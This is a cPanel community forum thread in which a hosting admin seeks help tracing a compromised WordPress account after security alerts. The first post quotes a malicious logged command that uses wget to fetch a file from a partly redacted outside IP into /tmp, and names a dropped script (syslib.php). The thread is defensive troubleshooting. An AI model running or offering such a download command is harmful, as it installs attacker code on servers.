The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

suspicious process from client website

Discussion in 'Security' started by Hays Sleiman, Oct 25, 2016.

  1. Hays Sleiman

    Hays Sleiman Member

    Joined:
    Jan 19, 2016
    Messages:
    11
    Likes Received:
    1
    Trophy Points:
    3
    Location:
    Australia
    cPanel Access Level:
    Root Administrator
    Hi guys,

    I have WHM and CSF installed and after configuring all settings and so on, there is only one notice I keep getting from CSF that's suspicious however I can't seem to find the culprit file and need some help please.
    Code:
    Time:         Wed Oct 26 02:00:21 2016 +1100
    Account:      c150102a
    Resource:     Process Time
    Exceeded:     3026245 > 1800 (seconds)
    Executable:   /usr/bin/bash
    Command Line: [B]sh -c cd /tmp ; /usr/bin/wget -t0 -c [URL]http://176.119.x.xx:82/338/d/sess_3306573f35a450867b3c55f039474766[/URL] 1> /dev/null 2> /dev/null && echo OK[/B]
    PID:          2261 (Parent PID:2260)
    Killed:       No
    I am particularly worried about the calls to that IP ^ (176.119.x.xx). I tried getting some info on it, and can only find that it's based in the Ukraine and some suspicious reports on it but nothing definitive.

    Another thing I'm finding in CSF logs are from the same client account:

    Executable: /usr/bin/php
    Command Line: /usr/bin/php /home/c150102a/public_html/wp-content/themes/main-theme/syslib.php

    I opened the syslib.php file and it was indeed a bad file. I got rid of it but I'm still getting the log in csf. Does this mean something is still trying to run this file?

    I have updated all wordpress files on this specific account (c150102a) and removed all but 3 plugins which I know aren't the cause. I've run some scanners and can't find any bad scripts or any files containing the above commands.

    So my question is, what is my next step apart from removing the account all together? I'm not sure how to find what is making calling that command? Is there any way I can find the culprit?
     
    #1 Hays Sleiman, Oct 25, 2016
    Last edited by a moderator: Oct 25, 2016
  2. SysSachin

    SysSachin Well-Known Member

    Joined:
    Aug 23, 2015
    Messages:
    542
    Likes Received:
    39
    Trophy Points:
    28
    Location:
    India
    cPanel Access Level:
    Root Administrator
    Twitter:
    As per the above alert , Your user c150102a was running command through SSH. You can remove that account from your server also please check /tmp directory and remove all unwanted file.
    If you are not sure about that then please contact to your system admin.
     
    #2 SysSachin, Oct 26, 2016
    Last edited by a moderator: Oct 26, 2016
  3. Hays Sleiman

    Hays Sleiman Member

    Joined:
    Jan 19, 2016
    Messages:
    11
    Likes Received:
    1
    Trophy Points:
    3
    Location:
    Australia
    cPanel Access Level:
    Root Administrator
    I am the system admin. I run the WHM server myself to host client websites.

    I'm sorry but I do not believe removing the c150102a account is a solution. The account hosts a website for a customer of mine and I cannot simply remove it.

    I would like to learn how to properly diagnose which file is running the command so I can resolve the issue and know how to deal with it in case I run in to something like this again.
     
  4. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    15,618
    Likes Received:
    296
    Trophy Points:
    433
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:
    You might want to google that filename, syslib.php for starters.
     
  5. Hays Sleiman

    Hays Sleiman Member

    Joined:
    Jan 19, 2016
    Messages:
    11
    Likes Received:
    1
    Trophy Points:
    3
    Location:
    Australia
    cPanel Access Level:
    Root Administrator
    Well I found the syslib.php file and removed it. I also did a search for any eval(base64_decode(...)) scripts but didn't find any.

    However, I am still receiving the CSF alerts for something calling a command to that Ukraine IP.

    Any other suggestions?
     
  6. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    15,618
    Likes Received:
    296
    Trophy Points:
    433
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:
    Have you checked the account for existing cron jobs?
    Cron Jobs - Documentation - cPanel Documentation

    That account shouldn't have access to SSH. It's been compromised and should be removed from the server and a backup from before this came up, restored in it's place. Without more knowledge of the server and your security, it's hard to say if the entire server has been compromised or not.

    You really should hire someone for assistance with this if you're unsure of your path forward here. This thread is two days old. Your server's been running a compromised site for at least two days too long.
     
  7. Hays Sleiman

    Hays Sleiman Member

    Joined:
    Jan 19, 2016
    Messages:
    11
    Likes Received:
    1
    Trophy Points:
    3
    Location:
    Australia
    cPanel Access Level:
    Root Administrator
    I double checked. There are no existing cron jobs for any of the users.

    And this site has been live for months, yet there are no performance issues and nothing else suspicious going on. No other accounts are reporting any bad activities or scripts. In fact, CSF does not report anything else at all apart from that one alert over and over.

    I have run numerous scanners on the account itself internall and externally and a several WordPress plugin scanners and none of them have picked up on anything at all.

    If all else fails and I can't find the culprit, I will remove the account and rebuild the site. However, I am still keen to know what could be causing this...
     
  8. Hays Sleiman

    Hays Sleiman Member

    Joined:
    Jan 19, 2016
    Messages:
    11
    Likes Received:
    1
    Trophy Points:
    3
    Location:
    Australia
    cPanel Access Level:
    Root Administrator
    Hi guys, so I went through all the accounts I had (47 in total) and found only 3 accounts with Shell access. None of these accounts were the same as the one mentioned above that was giving warnings.

    However, after fixing this and removing Shell access for these 3 accounts and restarting the server, the warnings have stopped. Not sure what stopped it or what was causing it still, but everything seems fine now and no more security alerts.

    Also a system wide scan was clean, so I believe the server is fine and there are no more threats or compromised sites.
     
    Infopro likes this.
  9. NixTree

    NixTree Well-Known Member

    Joined:
    Aug 19, 2010
    Messages:
    404
    Likes Received:
    2
    Trophy Points:
    143
    Location:
    Gods Own Country
    cPanel Access Level:
    Root Administrator
    Twitter:
    Hi

    Are you sure you have mounted /tmp and /dev/shm as noexec and nosuid ? If not please do it asap and remount both partitions.

    Surely the account mentioned is upto some sort of hack and you need to interospect the account in a detailed manner. Did you checked and scanned the account in question ? Also look for the recent files modified for that account say last 90 days . and see if you are getting any clue. Also check the POST requests in the access logs and see if you are seeing any suspicious entries
     
Loading...

Share This Page